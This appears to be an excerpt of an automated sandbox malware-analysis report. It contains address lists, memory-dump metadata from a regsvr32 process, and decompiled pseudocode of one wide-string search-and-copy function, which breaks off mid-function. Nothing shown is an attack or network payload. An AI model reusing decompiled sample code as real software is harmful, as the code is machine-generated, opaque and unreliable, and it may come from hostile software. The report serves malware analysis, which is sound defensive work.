0x004865be
0x00486668
0x00486670
0x00486675
0x0048667b
0x00486e6d
0x00486681
0x00486683
0x00486686
0x0048669e
0x004866a2
0x004866ae
0x004866b4
0x004866b4
0x004866b9
0x004866bd
0x004866c3
0x00000000
0x00000000
0x004866c9
0x004866ce
0x00000000
0x004866d0
0x004866d6
0x004866eb
0x004866eb
0x004866d8
0x004866d8
0x004866e2
0x004866e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004866e9
0x00000000
0x004866d8
0x004866d6
0x00000000
0x004866ce
0x00486e66
0x00486e69
0x00000000
0x00486688
0x0048668a
0x0048668c
0x0048668f
0x00486699
0x0048669c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0048669c
0x00486e55
0x00486e58
0x00486e5e
0x00486e5e
0x00486e58
0x00486686
0x004866f0
0x004866f0
0x004866fb
0x00486702
0x00486712
0x00486715
0x00486719
0x0048671f
0x00486727
0x00486727
0x00486734
0x00486737
0x0048673b
0x0048673c
0x00486741
0x00486744
0x0048674a
0x0048679d
0x0048674c
0x0048674e
0x00486750
0x00486753
0x00486757
0x0048675b
0x0048675f
0x00486761
0x00486764
0x00486764
0x00486765
0x0048676a
0x00486770
0x00000000
0x00000000
0x00486772
0x00486776
0x0048677b
0x00000000
0x00000000
0x00000000
0x0048677b
0x0048677d
0x00486781
0x00486784
0x00486784
0x00486757
0x00486788
0x0048678a
0x0048678b
0x0048678f
0x00486794
0x00486798
0x00486798
0x004867a4
0x004867a8
0x004867a8
0x004867ac
0x004867b0
0x00486526
0x00486526
0x00486526
0x004867b7
0x00486e4e
0x004867bd
0x004867bf
0x004867c2
0x004867da
0x004867de
0x004867ea
0x004867f0
0x004867f0
0x004867f5
0x004867f9
0x004867ff
0x00000000
0x00000000
0x00486805
0x0048680a
0x00000000
0x0048680c
0x00486812
0x00486827
0x00486827
0x00486814
0x00486814
0x0048681e
0x00486825
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00486825
0x00000000
0x00486814
0x00486812
0x00000000
0x0048680a
0x00486e47
0x00486e4a
0x00000000
0x004867c4
0x004867c6
0x004867c8
0x004867cb
0x004867d5
0x004867d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004867d8
0x00486e36
0x00486e39
0x00486e3f
0x00486e3f
0x00486e39
0x004867c2
0x0048682c
0x00486837
0x0048683e
0x00486856
0x0048685a
0x00486860
0x00486868
0x00486868
0x00486876
0x00486879
0x0048687d
0x0048687e
0x00486883
0x00486886
0x0048688c
0x004868db
0x0048688e
0x00486890
0x00486892
0x00486895
0x00486899
0x0048689d
0x004868a1
0x004868a3
0x004868a6
0x004868a6
0x004868a7
0x004868ac
0x004868b2
0x00000000
0x00000000
0x004868b4
0x004868b8
0x004868bd
0x00000000
0x00000000
0x00000000
0x004868bd
0x004868bf
0x004868c3
0x004868c3
0x00486899
0x004868c6
0x004868c8
0x004868c9
0x004868cd
0x004868d2
0x004868d6
0x004868d6
0x004868e2
0x004868e6
0x00486840
0x00486840
0x00486840
0x00000000

Strings

@, xrefs: 00486DCB

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction ID: aacdc5bc31cc07000555582d92e7be03df671d56c7d092dd8a2bcb5fd51bd18d
Opcode Fuzzy Hash: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction Fuzzy Hash: 88725D709087914BD769EE39C49073F7AD36FD2304F2ACA5ED8950B396EA398C41C786

Uniqueness

Uniqueness Score: -1.00%

Function 0047C590, Relevance: 2.1, Strings: 1, Instructions: 878
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0047C590(signed int* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed short* _t304;
				unsigned int _t312;
				signed int _t313;
				signed short** _t319;
				signed short* _t323;
				signed int* _t325;
				signed int _t330;
				signed int _t334;
				signed int _t338;
				unsigned int _t340;
				unsigned int _t341;
				signed int _t343;
				unsigned int _t344;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t357;
				signed int _t360;
				unsigned int _t366;
				signed int _t367;
				void* _t373;
				signed int _t376;
				signed int _t377;
				unsigned int _t383;
				unsigned int _t384;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t396;
				signed int _t398;
				signed int* _t405;
				signed int _t406;
				signed int _t412;
				signed int _t418;
				signed int _t421;
				signed int _t426;
				signed int _t432;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t452;
				signed int _t457;
				signed int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t469;
				signed int _t476;
				signed int _t479;
				signed int _t480;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				void* _t493;
				signed int _t494;
				signed int _t495;
				signed int _t498;
				intOrPtr* _t500;
				signed int _t501;
				signed int _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t508;
				signed int _t510;
				signed int _t513;
				signed int _t518;
				void* _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				void* _t523;
				signed int _t524;
				signed int _t525;
				signed int _t528;
				signed int* _t529;
				signed int _t530;
				signed int _t534;
				signed int _t537;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t552;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t570;
				signed int _t571;
				signed int _t574;
				signed int _t581;
				signed short* _t582;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				intOrPtr* _t594;
				signed int _t595;
				signed short* _t596;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t609;
				signed int _t611;
				signed int* _t614;

				_v64 = 0;
				_t405 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t551 = E00471030();
				_t614 = (_t611 & 0xfffffff0) - 0x34 + 4;
				_t304 = _v64;
				if(_t304 == 0) {
					__eflags = 0;
					 *_t551 = 0;
					L8:
					_v60 = 0x40;
					_v64 = _t551;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t551;
						if(_t551 == 0) {
							_t459 = 0x40;
							_t581 = 0;
							L23:
							_t24 = _t581 + 2; // -2147483652
							_t493 = _t24;
							__eflags = _t493 - 0x40;
							_t494 =  <=  ? 0x40 : _t493;
							__eflags = _t459 - _t494;
							if(_t459 < _t494) {
								_t312 = (_t494 >> 5 >> 0x1a) + _t494 >> 6;
								_t495 = _t494 & 0x8000003f;
								__eflags = _t495;
								if(_t495 < 0) {
									_t495 = (_t495 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t495;
								}
								__eflags = _t495;
								_t313 = _t312 + (0 | _t495 > 0x00000000);
								 *_t614 = _t313 << 6;
								_push(_t313 << 7);
								_t552 = E00471030();
								_t614 =  &(_t614[1]);
								_t498 = _v64;
								__eflags = _t498;
								if(_t498 == 0) {
									__eflags = 0;
									 *_t552 = 0;
									goto L35;
								} else {
									__eflags = _t552;
									if(_t552 == 0) {
										L33:
										_push(2);
										_push(_t498);
										E004710B0();
										_t614 =  &(_t614[2]);
										L35:
										_v60 =  *_t614;
										_v64 = _t552;
										L36:
										__eflags = 0;
										 *((short*)(_t552 + _t581 * 2)) = _a8 & 0x0000ffff;
										_t319 =  &_v64;
										 *((short*)( *_t319 + 2 + _t581 * 2)) = 0;
										L37:
										_t582 =  *_t319;
										if(_t582 == 0) {
											L39:
											_t500 = _a4;
											_push(0x80);
											 *_t500 = 0;
											 *((intOrPtr*)(_t500 + 4)) = 0;
											_t406 = E00471030();
											_t614 =  &(_t614[1]);
											_t323 =  *_a4;
											if(_t323 == 0) {
												 *_t406 = 0;
												L60:
												_t325 = _a4;
												 *_t325 = _t406;
												_t325[1] = 0x40;
												L61:
												_push(2);
												_push(_v64);
												E004710B0();
												_v64 = 0;
												_v60 = 0;
												return _a4;
											}
											if(_t406 == 0) {
												L45:
												_push(2);
												_push(_t323);
												E004710B0();
												_t614 =  &(_t614[2]);
												goto L60;
											}
											_t501 =  *_t323 & 0x0000ffff;
											 *_t406 = _t501;
											if(_t501 == 0) {
												goto L45;
											}
											_t502 = 0;
											while(1) {
												_t502 = _t502 + 1;
												_t463 =  *(_t323 + _t502 * 4 - 2) & 0x0000ffff;
												 *(_t406 + _t502 * 4 - 2) = _t463;
												if(_t463 == 0) {
													goto L45;
												}
												_t464 =  *(_t323 + _t502 * 4) & 0x0000ffff;
												 *(_t406 + _t502 * 4) = _t464;
												if(_t464 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t330 =  *_t582 & 0x0000ffff;
										if(_t330 != 0) {
											_t554 =  *_t405;
											__eflags = _t554;
											if(_t554 == 0) {
												L52:
												_t503 = _a4;
												_push(0x80);
												 *_t503 = 0;
												 *((intOrPtr*)(_t503 + 4)) = 0;
												_t406 = E00471030();
												_t614 =  &(_t614[1]);
												_t334 =  *_a4;
												__eflags = _t334;
												if(_t334 == 0) {
													__eflags = 0;
													 *_t406 = 0;
													goto L60;
												}
												__eflags = _t406;
												if(_t406 == 0) {
													L58:
													_push(2);
													_push(_t334);
													E004710B0();
													_t614 =  &(_t614[2]);
													goto L60;
												}
												_t504 =  *_t334 & 0x0000ffff;
												 *_t406 = _t504;
												__eflags = _t504;
												if(_t504 == 0) {
													goto L58;
												}
												_t505 = 0;
												__eflags = 0;
												while(1) {
													_t505 = _t505 + 1;
													_t465 =  *(_t334 + _t505 * 4 - 2) & 0x0000ffff;
													 *(_t406 + _t505 * 4 - 2) = _t465;
													__eflags = _t465;
													if(_t465 == 0) {
														goto L58;
													}
													_t466 =  *(_t334 + _t505 * 4) & 0x0000ffff;
													 *(_t406 + _t505 * 4) = _t466;
													__eflags = _t466;
													if(_t466 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t554 & 0x0000ffff;
											if(( *_t554 & 0x0000ffff) == 0) {
												goto L52;
											}
											_v24 = _t582;
											__eflags = _t330 - 0x41 - 0x19;
											_t337 =  <=  ? _t330 + 0x20 : _t330;
											_t508 = 0;
											__eflags = 0;
											_t338 = ( <=  ? _t330 + 0x20 : _t330) & 0x0000ffff;
											_v44 = _t338;
											while(1) {
												_t584 =  *(_t554 + _t508 * 2) & 0x0000ffff;
												_t67 = _t584 - 0x41; // 0x7fffffbe
												__eflags = _t67 - 0x19;
												_t68 = _t584 + 0x20; // 0x8000001f
												_t585 =  <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff;
												__eflags = ( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) - _t338;
												if(( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) == _t338) {
													break;
												}
												_t508 = _t508 + 1;
												__eflags =  *(_t554 + _t508 * 2) & 0x0000ffff;
												if(( *(_t554 + _t508 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												goto L52;
											}
											_t586 = _v24;
											_t469 = _t554 + _t508 * 2;
											__eflags = _t469;
											if(_t469 == 0) {
												goto L52;
											}
											_t510 = _t586 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t340 = _t510 & 0x00000001;
											_t412 =  ~_t510 + 0x10 >> 1;
											_v52 = _t412;
											_v36 = _t554;
											_v24 = _t586;
											_t555 = _t412;
											while(1) {
												L68:
												_t587 = _t510;
												__eflags = _t510;
												if(_t510 == 0) {
													goto L74;
												}
												_t421 = 0;
												__eflags = _t340;
												if(_t340 != 0) {
													L78:
													_v28 = _t340;
													_t603 = _v24;
													while(1) {
														__eflags =  *(_t603 + _t421 * 2) & 0x0000ffff;
														if(( *(_t603 + _t421 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t421 = _t421 + 1;
														__eflags = _t421 - 0x7fffffff;
														if(_t421 < 0x7fffffff) {
															continue;
														}
														_v24 = _t603;
														_t341 = _v28;
														L82:
														_t421 = 0x7fffffff;
														L83:
														 *_t614 = _t421;
														_t588 = 0;
														__eflags = 0;
														_v32 = _t510;
														_v28 = _t341;
														while(1) {
															_t422 =  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t124 = _t422 - 0x61; // 0x7fffff9e
															_t559 =  *(_v24 + _t588 * 2) & 0x0000ffff;
															__eflags = _t124 - 0x19;
															_t127 = _t422 - 0x20; // 0x7fffffdf
															_t423 =  <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t343 = ( <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff) & 0x0000ffff;
															__eflags = _t559 - 0x61 - 0x19;
															_t560 =  <=  ? _t559 - 0x20 : _t559;
															__eflags = _t343 - ( <=  ? _t559 - 0x20 : _t559);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t343;
															if(_t343 == 0) {
																L88:
																_t510 = _v32;
																_t341 = _v28;
																_t563 = _v36;
																_t591 = _v24;
																L89:
																__eflags = _t469;
																if(_t469 == 0) {
																	goto L52;
																}
																_v28 = _t341;
																_v36 = _t563;
																_v24 = _t591;
																_t592 = 0;
																__eflags = 0;
																while(1) {
																	L91:
																	_t564 = _t469;
																	_t349 = _t469 + 2;
																	__eflags = _t349;
																	if(_t349 == 0) {
																		break;
																	}
																	__eflags =  *(_t469 + 2) & 0x0000ffff;
																	if(( *(_t469 + 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	 *_t614 = _t564;
																	_t443 = _t592;
																	_v32 = _t510;
																	while(1) {
																		_t443 = _t443 + 1;
																		_t596 = _t469 + _t443 * 2;
																		_t537 =  *_t596 & 0x0000ffff;
																		__eflags = ( *(_t349 + _t443 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																		_v48 = _t596;
																		_t538 =  <=  ? _t537 + 0x20 : _t537;
																		__eflags = ( <=  ? _t537 + 0x20 : _t537) - _v44;
																		if(( <=  ? _t537 + 0x20 : _t537) == _v44) {
																			break;
																		}
																		__eflags =  *(_t349 + _t443 * 2) & 0x0000ffff;
																		if(( *(_t349 + _t443 * 2) & 0x0000ffff) != 0) {
																			continue;
																		}
																		L96:
																		_t510 = _v32;
																		_t350 = _v28;
																		_t565 = _v36;
																		_t593 = _v24;
																		L97:
																		__eflags = _t510;
																		if(_t510 == 0) {
																			L102:
																			_t476 =  ~( ~_t510 + 0x00000007 & 0x00000007) + 0x7fffffff;
																			__eflags = _t476;
																			while(1) {
																				asm("movdqu xmm1, [esi+edx*2]");
																				asm("pcmpeqw xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t350;
																				if(_t350 != 0) {
																					break;
																				}
																				_t510 = _t510 + 8;
																				__eflags = _t510 - _t476;
																				if(_t510 < _t476) {
																					continue;
																				}
																				__eflags = _t476 - 0x7fffffff;
																				if(_t476 >= 0x7fffffff) {
																					L108:
																					_t476 = 0x7fffffff;
																					L109:
																					_t352 = _t565 & 0x0000000f;
																					__eflags = _t352;
																					if(_t352 == 0) {
																						L114:
																						_t432 =  ~( ~_t352 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t432;
																						while(1) {
																							asm("movdqu xmm1, [edi+eax*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb edx, xmm1");
																							__eflags = _t510;
																							if(_t510 != 0) {
																								break;
																							}
																							_t352 = _t352 + 8;
																							__eflags = _t352 - _t432;
																							if(_t352 < _t432) {
																								continue;
																							}
																							__eflags = _t432 - 0x7fffffff;
																							if(_t432 >= 0x7fffffff) {
																								L120:
																								_t432 = 0x7fffffff;
																								L121:
																								_t594 = _a4;
																								_t518 =  *_t614 - _t565 + _t476 * 2 >> 1;
																								__eflags = _t518;
																								 *_t594 = 0;
																								_t519 =  <=  ? 0 : _t518;
																								__eflags = _t432 - _t519;
																								 *((intOrPtr*)(_t594 + 4)) = 0;
																								_t520 =  <  ? _t432 : _t519;
																								_t434 = _t432 - _t520;
																								_t566 = _t565 + _t520 * 2;
																								__eflags = _t566;
																								if(_t566 == 0) {
																									L156:
																									_push(0x80);
																									_t406 = E00471030();
																									_t614 =  &(_t614[1]);
																									_t357 =  *_a4;
																									__eflags = _t357;
																									if(_t357 == 0) {
																										 *_t406 = 0;
																										goto L60;
																									}
																									__eflags = _t406;
																									if(_t406 == 0) {
																										L162:
																										_push(2);
																										_push(_t357);
																										E004710B0();
																										_t614 =  &(_t614[2]);
																										goto L60;
																									}
																									_t521 =  *_t357 & 0x0000ffff;
																									 *_t406 = _t521;
																									__eflags = _t521;
																									if(_t521 == 0) {
																										goto L162;
																									}
																									_t522 = 0;
																									__eflags = 0;
																									while(1) {
																										_t522 = _t522 + 1;
																										_t479 =  *(_t357 + _t522 * 4 - 2) & 0x0000ffff;
																										 *(_t406 + _t522 * 4 - 2) = _t479;
																										__eflags = _t479;
																										if(_t479 == 0) {
																											goto L162;
																										}
																										_t480 =  *(_t357 + _t522 * 4) & 0x0000ffff;
																										 *(_t406 + _t522 * 4) = _t480;
																										__eflags = _t480;
																										if(_t480 != 0) {
																											continue;
																										}
																										goto L162;
																									}
																									goto L162;
																								}
																								_t360 =  *_t566 & 0x0000ffff;
																								__eflags = _t360;
																								if(_t360 == 0) {
																									goto L156;
																								}
																								__eflags = _t434;
																								if(_t434 != 0) {
																									L136:
																									_t176 = _t434 + 1; // 0x80000000
																									_t523 = _t176;
																									__eflags = _t523 - 0x40;
																									_t524 =  <=  ? 0x40 : _t523;
																									__eflags = _t524;
																									if(_t524 > 0) {
																										_t366 = (_t524 >> 5 >> 0x1a) + _t524 >> 6;
																										_t525 = _t524 & 0x8000003f;
																										__eflags = _t525;
																										if(_t525 < 0) {
																											_t525 = (_t525 - 0x00000001 | 0xffffffc0) + 1;
																											__eflags = _t525;
																										}
																										__eflags = _t525;
																										_t367 = _t366 + (0 | _t525 > 0x00000000);
																										 *_t614 = _t367 << 6;
																										_push(_t367 << 7);
																										_t595 = E00471030();
																										_t614 =  &(_t614[1]);
																										_t528 =  *_a4;
																										__eflags = _t528;
																										if(_t528 == 0) {
																											__eflags = 0;
																											 *_t595 = 0;
																											goto L148;
																										} else {
																											__eflags = _t595;
																											if(_t595 == 0) {
																												L146:
																												_push(2);
																												_push(_t528);
																												E004710B0();
																												_t614 =  &(_t614[2]);
																												L148:
																												_t529 = _a4;
																												_t529[1] =  *_t614;
																												 *_t529 = _t595;
																												L149:
																												__eflags = _t595;
																												if(_t595 == 0) {
																													goto L61;
																												}
																												_t373 = 0;
																												while(1) {
																													_t530 =  *_t566 & 0x0000ffff;
																													_t373 = _t373 + 1;
																													 *_t595 = _t530;
																													__eflags = _t434;
																													if(_t434 == 0) {
																														goto L154;
																													}
																													__eflags = _t373 - _t434;
																													if(_t373 == _t434) {
																														 *(_t595 + 2) = 0;
																														goto L61;
																													}
																													L154:
																													__eflags = _t530;
																													if(_t530 == 0) {
																														goto L61;
																													}
																													_t595 = _t595 + 2;
																													_t566 = _t566 + 2;
																													__eflags = _t566;
																												}
																											}
																											_t376 =  *_t528 & 0x0000ffff;
																											 *_t595 = _t376;
																											__eflags = _t376;
																											if(_t376 == 0) {
																												goto L146;
																											}
																											_t377 = 0;
																											__eflags = 0;
																											while(1) {
																												_t377 = _t377 + 1;
																												_t483 =  *(_t528 + _t377 * 4 - 2) & 0x0000ffff;
																												 *(_t595 + _t377 * 4 - 2) = _t483;
																												__eflags = _t483;
																												if(_t483 == 0) {
																													goto L146;
																												}
																												_t484 =  *(_t528 + _t377 * 4) & 0x0000ffff;
																												 *(_t595 + _t377 * 4) = _t484;
																												__eflags = _t484;
																												if(_t484 != 0) {
																													continue;
																												}
																												goto L146;
																											}
																											goto L146;
																										}
																									}
																									_t595 = 0;
																									goto L149;
																								}
																								_t534 = _t566 & 0x0000000f;
																								__eflags = _t534;
																								if(_t534 == 0) {
																									L129:
																									_t434 =  ~( ~_t534 + 0x00000007 & 0x00000007) + 0x7fffffff;
																									__eflags = _t434;
																									while(1) {
																										asm("movdqu xmm1, [edi+edx*2]");
																										asm("pcmpeqw xmm1, xmm0");
																										asm("pmovmskb eax, xmm1");
																										__eflags = _t360;
																										if(_t360 != 0) {
																											break;
																										}
																										_t534 = _t534 + 8;
																										__eflags = _t534 - _t434;
																										if(_t534 < _t434) {
																											continue;
																										}
																										__eflags = _t434 - 0x7fffffff;
																										if(_t434 >= 0x7fffffff) {
																											L135:
																											_t434 = 0x7fffffff;
																											goto L136;
																										} else {
																											goto L133;
																										}
																										while(1) {
																											L133:
																											__eflags =  *(_t566 + _t434 * 2) & 0x0000ffff;
																											if(( *(_t566 + _t434 * 2) & 0x0000ffff) == 0) {
																												goto L136;
																											}
																											_t434 = _t434 + 1;
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 < 0x7fffffff) {
																												continue;
																											}
																											goto L135;
																										}
																										goto L136;
																									}
																									asm("bsf ebx, eax");
																									_t434 = (_t434 >> 1) + _t534;
																									goto L136;
																								}
																								_t434 = 0;
																								__eflags = _t534 & 0x00000001;
																								if((_t534 & 0x00000001) != 0) {
																									goto L133;
																								}
																								_t534 =  ~_t534 + 0x10 >> 1;
																								__eflags = _t534;
																								while(1) {
																									_t360 =  *(_t566 + _t434 * 2) & 0x0000ffff;
																									__eflags = _t360;
																									if(_t360 == 0) {
																										goto L136;
																									}
																									_t434 = _t434 + 1;
																									__eflags = _t434 - _t534;
																									if(_t434 < _t534) {
																										continue;
																									}
																									goto L129;
																								}
																								goto L136;
																							} else {
																								goto L118;
																							}
																							while(1) {
																								L118:
																								__eflags =  *(_t565 + _t432 * 2) & 0x0000ffff;
																								if(( *(_t565 + _t432 * 2) & 0x0000ffff) == 0) {
																									goto L121;
																								}
																								_t432 = _t432 + 1;
																								__eflags = _t432 - 0x7fffffff;
																								if(_t432 < 0x7fffffff) {
																									continue;
																								}
																								goto L120;
																							}
																							goto L121;
																						}
																						asm("bsf ebx, edx");
																						_t432 = (_t432 >> 1) + _t352;
																						goto L121;
																					}
																					_t432 = 0;
																					__eflags = _t352 & 0x00000001;
																					if((_t352 & 0x00000001) != 0) {
																						goto L118;
																					}
																					_t352 =  ~_t352 + 0x10 >> 1;
																					__eflags = _t352;
																					while(1) {
																						_t510 =  *(_t565 + _t432 * 2) & 0x0000ffff;
																						__eflags = _t510;
																						if(_t510 == 0) {
																							goto L121;
																						}
																						_t432 = _t432 + 1;
																						__eflags = _t432 - _t352;
																						if(_t432 < _t352) {
																							continue;
																						}
																						goto L114;
																					}
																					goto L121;
																				} else {
																					goto L106;
																				}
																				while(1) {
																					L106:
																					__eflags =  *(_t593 + _t476 * 2) & 0x0000ffff;
																					if(( *(_t593 + _t476 * 2) & 0x0000ffff) == 0) {
																						goto L109;
																					}
																					_t476 = _t476 + 1;
																					__eflags = _t476 - 0x7fffffff;
																					if(_t476 < 0x7fffffff) {
																						continue;
																					}
																					goto L108;
																				}
																				goto L109;
																			}
																			asm("bsf ecx, eax");
																			_t476 = (_t476 >> 1) + _t510;
																			goto L109;
																		}
																		_t476 = 0;
																		__eflags = _t350;
																		if(_t350 != 0) {
																			goto L106;
																		}
																		_t510 = _v52;
																		_t441 = _t510;
																		while(1) {
																			_t350 =  *(_t593 + _t476 * 2) & 0x0000ffff;
																			__eflags = _t350;
																			if(_t350 == 0) {
																				goto L109;
																			}
																			_t476 = _t476 + 1;
																			__eflags = _t476 - _t441;
																			if(_t476 < _t441) {
																				continue;
																			}
																			goto L102;
																		}
																		goto L109;
																	}
																	_t485 = _v48;
																	_t510 = _v32;
																	_t570 = _v52;
																	_t383 = _v28;
																	while(1) {
																		_t598 = _t510;
																		__eflags = _t510;
																		if(_t510 == 0) {
																			goto L180;
																		}
																		L175:
																		_t452 = 0;
																		__eflags = _t383;
																		if(_t383 != 0) {
																			L184:
																			_v28 = _t383;
																			_t602 = _v24;
																			while(1) {
																				__eflags =  *(_t602 + _t452 * 2) & 0x0000ffff;
																				if(( *(_t602 + _t452 * 2) & 0x0000ffff) == 0) {
																					break;
																				}
																				_t452 = _t452 + 1;
																				__eflags = _t452 - 0x7fffffff;
																				if(_t452 < 0x7fffffff) {
																					continue;
																				}
																				_v24 = _t602;
																				_t384 = _v28;
																				L188:
																				_t452 = 0x7fffffff;
																				L189:
																				_v56 = _t452;
																				_t599 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t384;
																				while(1) {
																					_t453 =  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t241 = _t453 - 0x61; // 0x7fffff9e
																					_t574 =  *(_v24 + _t599 * 2) & 0x0000ffff;
																					__eflags = _t241 - 0x19;
																					_t244 = _t453 - 0x20; // 0x7fffffdf
																					_t454 =  <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t386 = ( <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff) & 0x0000ffff;
																					__eflags = _t574 - 0x61 - 0x19;
																					_t575 =  <=  ? _t574 - 0x20 : _t574;
																					__eflags = _t386 - ( <=  ? _t574 - 0x20 : _t574);
																					if(__eflags < 0 || __eflags > 0) {
																						break;
																					}
																					__eflags = _t386;
																					if(_t386 == 0) {
																						L194:
																						_t564 =  *_t614;
																						_t592 = _t599 ^ _t599;
																						__eflags = _t592;
																						_t510 = _v32;
																						L195:
																						__eflags = _t485;
																						if(_t485 != 0) {
																							goto L91;
																						}
																						goto L196;
																					}
																					_t599 = _t599 + 1;
																					__eflags = _t599 - _v56;
																					if(_t599 < _v56) {
																						continue;
																					}
																					goto L194;
																				}
																				_t510 = _v32;
																				_t350 = _v28;
																				_t601 = _t485 + 2;
																				__eflags = _t601;
																				if(_t601 == 0) {
																					L207:
																					_t565 = _v36;
																					_t593 = _v24;
																					goto L97;
																				}
																				__eflags =  *(_t485 + 2) & 0x0000ffff;
																				if(( *(_t485 + 2) & 0x0000ffff) == 0) {
																					goto L207;
																				}
																				_v40 = _t485;
																				_t457 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t350;
																				while(1) {
																					_t457 = _t457 + 1;
																					_t485 = _v40 + _t457 * 2;
																					_t387 =  *_t485 & 0x0000ffff;
																					__eflags = ( *(_t601 + _t457 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																					_t388 =  <=  ? _t387 + 0x20 : _t387;
																					__eflags = ( <=  ? _t387 + 0x20 : _t387) - _v44;
																					if(( <=  ? _t387 + 0x20 : _t387) == _v44) {
																						break;
																					}
																					__eflags =  *(_t601 + _t457 * 2) & 0x0000ffff;
																					if(( *(_t601 + _t457 * 2) & 0x0000ffff) != 0) {
																						continue;
																					}
																					goto L96;
																				}
																				_t510 = _v32;
																				_t570 = _v52;
																				_t383 = _v28;
																				_t598 = _t510;
																				__eflags = _t510;
																				if(_t510 == 0) {
																					goto L180;
																				}
																				goto L175;
																			}
																			_v24 = _t602;
																			_t384 = _v28;
																			L198:
																			__eflags = _t452;
																			if(__eflags == 0) {
																				goto L188;
																			}
																			if(__eflags > 0) {
																				goto L189;
																			}
																			_v28 = _t384;
																			_t592 = 0;
																			_t564 =  *_t614;
																			goto L195;
																		}
																		_v32 = _t510;
																		_t598 = _t570;
																		_v28 = _t383;
																		_t544 = _v24;
																		while(1) {
																			__eflags =  *(_t544 + _t452 * 2) & 0x0000ffff;
																			if(( *(_t544 + _t452 * 2) & 0x0000ffff) == 0) {
																				break;
																			}
																			_t452 = _t452 + 1;
																			__eflags = _t452 - _t570;
																			if(_t452 < _t570) {
																				continue;
																			}
																			_v24 = _t544;
																			_t510 = _v32;
																			_t383 = _v28;
																			goto L180;
																		}
																		_v24 = _t544;
																		_t510 = _v32;
																		_t384 = _v28;
																		goto L198;
																		L180:
																		_v28 = _t383;
																		_t449 =  ~( ~_t598 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t449;
																		_t571 = _v24;
																		while(1) {
																			asm("movdqu xmm1, [edi+esi*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb eax, xmm1");
																			__eflags = _t383;
																			if(_t383 != 0) {
																				break;
																			}
																			_t598 = _t598 + 8;
																			__eflags = _t598 - _t449;
																			if(_t598 < _t449) {
																				continue;
																			}
																			_v24 = _t571;
																			_t384 = _v28;
																			__eflags = _t449 - 0x7fffffff;
																			if(_t449 >= 0x7fffffff) {
																				goto L188;
																			}
																			goto L184;
																		}
																		asm("bsf ebx, ebx");
																		_v24 = _t571;
																		_t452 = (_t383 >> 1) + _t598;
																		_t384 = _v28;
																		goto L198;
																	}
																}
																L196:
																 *_t614 = _t564;
																_t350 = _v28;
																_t565 = _v36;
																_t593 = _v24;
																goto L97;
															}
															_t588 = _t588 + 1;
															__eflags = _t588 -  *_t614;
															if(_t588 <  *_t614) {
																continue;
															}
															goto L88;
														}
														_t513 = _v32;
														_t344 = _v28;
														_t590 = _t469 + 2;
														__eflags = _t590;
														if(_t590 == 0) {
															goto L52;
														}
														__eflags =  *(_t469 + 2) & 0x0000ffff;
														if(( *(_t469 + 2) & 0x0000ffff) == 0) {
															goto L52;
														}
														_v40 = _t469;
														_t426 = 0;
